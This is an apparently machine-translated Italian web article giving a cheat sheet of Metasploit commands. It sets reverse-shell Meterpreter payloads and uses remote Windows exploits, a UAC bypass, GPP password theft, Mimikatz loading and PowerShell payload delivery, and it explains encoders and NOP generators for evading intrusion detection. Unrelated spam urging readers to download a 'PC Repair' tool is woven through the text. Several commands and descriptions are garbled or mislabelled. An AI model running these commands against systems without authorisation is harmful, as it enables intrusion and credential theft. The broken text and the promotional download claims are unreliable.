Elenco dei comandi Metasploit (2021) usa Metasploit come un professionista!
Aggiornato 2023 di Marzo: Smetti di ricevere messaggi di errore e rallenta il tuo sistema con il nostro strumento di ottimizzazione. Scaricalo ora a - > questo link
- Scaricare e installare lo strumento di riparazione qui.
- Lascia che scansioni il tuo computer.
- Lo strumento sarà quindi ripara il tuo computer.
Vuoi utilizzare Metasploit Pro Framework o Metasploit Unleashed ? Bene, dovrai prima conoscere i loro comandi !. Di seguito condividiamo con te l'ultimo elenco dei comandi di Metasploit del 2021 . Questo cheat sheet contiene tutti i comandi di cui avrai mai bisogno dalle basi per avanzare!
In questa guida parleremo delle basi del cheat sheet dei comandi Metasploit che può essere utilizzato nell'interfaccia della riga di comando. Ci sono anche molte altre console a riga di comando disponibili su Internet (come MSFConsole Command Line ) ma sono davvero difficili da usare e da capire.
Che cos'è Metasploit Framework?
Metasploit è un prodotto che può essere utilizzato per entrare in un sistema remoto e possono anche essere utilizzati per testare la vulnerabilità di un sistema informatico. Come tutti gli altri strumenti di sicurezza delle informazioni, anche Metasploit può essere utilizzato per entrambi gli scopi (attività non autorizzate e legittime). Il Rapid7 ha anche aggiunto le due edizioni o versioni proprietarie chiamate Metasploit Pro e Metasploit Express. Puoi anche vedere alcuni dei nostri comandi di Kali Linux Terminal per l'hacking.
Note importanti:
Ora è possibile prevenire i problemi del PC utilizzando questo strumento, come la protezione contro la perdita di file e il malware. Inoltre, è un ottimo modo per ottimizzare il computer per ottenere le massime prestazioni. Il programma risolve gli errori comuni che potrebbero verificarsi sui sistemi Windows con facilità - non c'è bisogno di ore di risoluzione dei problemi quando si ha la soluzione perfetta a portata di mano:
- Passo 1: Scarica PC Repair & Optimizer Tool (Windows 11, 10, 8, 7, XP, Vista - Certificato Microsoft Gold).
- Passaggio 2: Cliccate su "Start Scan" per trovare i problemi del registro di Windows che potrebbero causare problemi al PC.
- Passaggio 3: Fare clic su "Ripara tutto" per risolvere tutti i problemi.
Metasploit evidenzia il rischio e la correzione di particolari bug che potrebbero essere disponibili nel tuo Personal Computer (PC). Successivamente, nel Metasploit 3.0 è stato incluso anche lo strumento fuzzing che è stato utilizzato per scoprire le vulnerabilità del software anche con gli exploit per i bug noti. Dopo qualche tempo il set di strumenti wireless Lorcon (802.11) è stato aggiunto anche a Metasploit 3.0 nel mese di novembre 2006. Dopo tutti questi aggiornamenti, Rapid7 ha rilasciato Metasploit 4.0 nel mese di agosto 2011.
Puoi ottieni Metasploit Pro Framework dalla pagina seguente:
Scarica Metasploit Pro Framework gratuitamente
Una breve storia di Metasploit Framework
H. D. Moore è stato il creatore di questo strumento di rete portatile chiamato Metasploit utilizzando Perl nel 2003. Nel 2007, il Metasploit Framework è stato completamente riscritto in Ruby. Il 21 ottobre st 2009, il Metasploit ha annunciato di essere stato acquistato o acquisito dal Rapid7. Rapid7 è una società di sicurezza che fornisce molti tipi di soluzioni unificate per la gestione delle vulnerabilità.
Elenco degli ultimi comandi Metasploit 2021 (Nuovo)
- Payload Meterpreter:
- Payload di Windows reverse meterpreter
| Comando | Descrizione di CMD |
| imposta payload windows/meterpreter/reverse_tcp | payload tcp inverso di Windows |
Payload Windows VNC per Meterpreter
| Comando | Descrizione di CMD |
| set payload windows/vncinject/reverse_tcpset ViewOnly false | Meterpreter Windows VNC Payload
|
Payload di Linux Reverse Meterpreter
| Comando | Descrizione di CMD |
| set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Comandi di Meterpreter Cheat Sheet (2021 più recenti)
Leggi: I 9 principali comandi di hacking del prompt dei comandi di Microsoft CMD nel 2021.
Moduli Metasploit comuni e Moduli Metasploit Windows remoti
| Comando | Descrizione di CMD |
| usa exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
| usa exploit/windows/dcerpc/ms06_040_netapi | MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
| usa exploit/windows/smb/ ms09_050_smb2_negotiate_func_index |
MS09_050 Windows Vista SP1/Exploit remoto di SP2 e Server 2008 (x86) |
Moduli Metasploit Windows locali
| Comando</” | Descrizione di CMD |
| usa exploit/windows/local/bypassuac | Bypass UAC su Windows 7 + Set target + arch, x86/64 |
Moduli Metasploit ausiliari
| Comando | Descrizione di CMD |
| usa ausiliario/scanner/http/dir_scanner | Metasploit scanner di directory HTTP |
| utilizza ausiliario/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner |
| usa ausiliario/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
| usa ausiliario/scanner/mysql/mysql_version | Metasploit MSSQL Version Scanner |
| usa ausiliario/scanner/oracle/oracle_login | Metasploit Oracle Login Module |
Leggi anche: The Perfect Guide to DDoS Like a Pro Hacker.
Metasploit Powershell Modules
| Comando | Descrizione di CMD |
| usa exploit/multi/script/web_delivery | Metasploit PowerShell payload delivery module |
| post/windows/Manage/powershell/exec_powershell | Metasploit carica ed esegui script PowerShell tramite una sessione |
| utilizza exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy |
| usa exploit/windows/mssql/mssql_payload | Metasploit payload MSSQL |
Moduli Metasploit di Windows post exploit
| Comando | Descrizione di CMD |
| esegui post/windows/gather/win_privs | Metasploit mostra i privilegi dell'utente corrente |
| usa post/windows/gather/credentials/gpp | Metasploit acquisisce password salvate GPP |
| oad mimikatz-\u0026 gt; wdigest | Metasplit carica Mimikatz |
| esegui post/windows/gather/local_admin_search_enum | Identificazione di altre macchine a cui l'utente di dominio fornito ha accesso amministrativo |
Fonte: TheHackToday</”
I comandi Metasploit di base che devi conoscere nel 2021
Il comando Metasploit per l'aggiornamento del Framework:
| aggiornamento apt; apt install metasploit-framework |
Il seguente comando menzionato sopra fornisce l'ultima versione del Framework Metasploit che viene aggiornato. L'aggiornamento dice quanto segue che dovremmo aggiornare l'aggiornamento settimanale la copia del nostro Metasploit Framework. Ma c'è un leggero svantaggio di questo comando ed è che l'esecuzione di questo comando potrebbe danneggiare o rompere la copia del tuo software che è installata sul tuo PC.
Lettura consigliata : Inizio 8 migliori distribuzioni Linux per hacking e penetration test!
Comandi Metasploit msfhelp/console:
Quando esegui Metasploit per la prima volta, la finestra seguente si apre sullo schermo. Se non sai nulla o non hai alcuna informazione relativa a Metasploit, puoi semplicemente digitare: help per visualizzare tutti i comandi e le informazioni relative a Metasploit.
Non ho intenzione di sprecare il tuo tempo nello spiegare tutti i comandi su Metasploit, ma discuterò alcuni dei comandi di base e più utilizzati che utilizzerai principalmente.
- Comandi di base: questi comandi sono usati per cercare, usare , Indietro, Aiuto, Informazioni ed Esci.
- Comandi di exploit: questi comandi vengono utilizzati per impostare le variabili e mostrare le opzioni di exploit e di evasione, i payload e gli encoder.
- Comandi di esecuzione di exploit : Questi comandi vengono utilizzati per eseguire ed eseguire exploit su un target specifico.
Comandi Metasploit più utili:
- Comando di ricerca:
Questo comando viene utilizzato per cercare diversi tipi o tipi di vulnerabilità e exploit dal msfconsole.
- Comando Info:
Questo comando viene utilizzato per tenere d'occhio la documentazione e dare un'occhiata al proprietario dell'exploit.
Leggi: 8 modi migliori per proteggere il tuo server Linux (Linux Hardening Guide 2021).
- Comando Mostra opzioni :
Con l'aiuto di questo semplice comando, possiamo usare i comandi show per visualizzare tutti i valori richiesti dal payload che possono essere ulteriormente usati per attaccare il PC vittima o la macchina che vogliamo attaccare.
- LHOST :
Con l'aiuto di questo comando, puoi facilmente eseguire l'attacco alla rete WAN devi solo impostare LHOST sull'indirizzo IP statico IP e su tutte le altre porte di inoltro.
- LPORT :
Se stai provando a sulla rete LAN, non devi eseguire il port forward ma puoi usare qualsiasi porta che vuoi usare. Ma se stai attaccando la rete WAN, devi eseguire il port forwarding della porta che vuoi attaccare rispettivamente.
- Mostra payload :
Con l'aiuto di questo comando, utilizziamo il comando show payloads. Questo comando restituirà un intero elenco di payload compatibili per il seguente exploit. Nella figura seguente il Metasploit ha caricato molti payload compatibili:
- Mostra obiettivi:
Questo comando restituirà un intero elenco di sistemi operativi che sono molto vulnerabili all'exploit selezionato o scelto. Dopo aver eseguito questo comando, otteniamo il seguente output del seguente exploit:
adobe_flash_shader_drawing_fill exploit.
- Show Advanced:
Utilizzando questo comando show advanced possiamo visualizzare tutte le opzioni avanzate per gli exploit richiesti.
Download: Software Nessus Professional Vulnerability Scanner.
- Mostra codificatori:
Questo comando viene utilizzato per restituire tutti i codificatori compatibili. Questi codificatori vengono utilizzati per eludere le semplici firme IDS/IPS che sono state cercate per determinati byte del payload disponibile.
- Mostra nops:
Questo comando restituirà un intero elenco dei generatori di NOP. NOP è l'abbreviazione di Nessuna operazione e viene utilizzata per modificare il modello per bypassare semplici IDS/IPS delle comuni slitte NOP. Questi generatori NOP iniziano con un'intera configurazione dell'architettura della CPU nel suo nome.
Download: Acunetix Web Vulnerability Scanner Free.
Puoi visitare il Offensive Security per i comandi AZ Metasploit completi.
Conosci altri comandi Metasploit che possiamo aggiungere a questo elenco?
In questo articolo, abbiamo discusso dell ' Elenco dei comandi Metasploit nel 2021 abbiamo anche parlato di molti comandi diversi che è possibile utilizzare per eseguire varie attività e tutte le diverse funzionalità. È un metodo totalmente sicuro per utilizzare ed eseguire il controllo delle vulnerabilità e per risolvere tutti i problemi correlati.
Spero che questa guida ti sia davvero utile. Condividilo con i tuoi amici e familiari per aiutarli a risolvere i loro problemi. Se hai qualche domanda, lasciala nella sezione commenti. Siamo sempre qui per aiutarti se hai bisogno di aiuto.
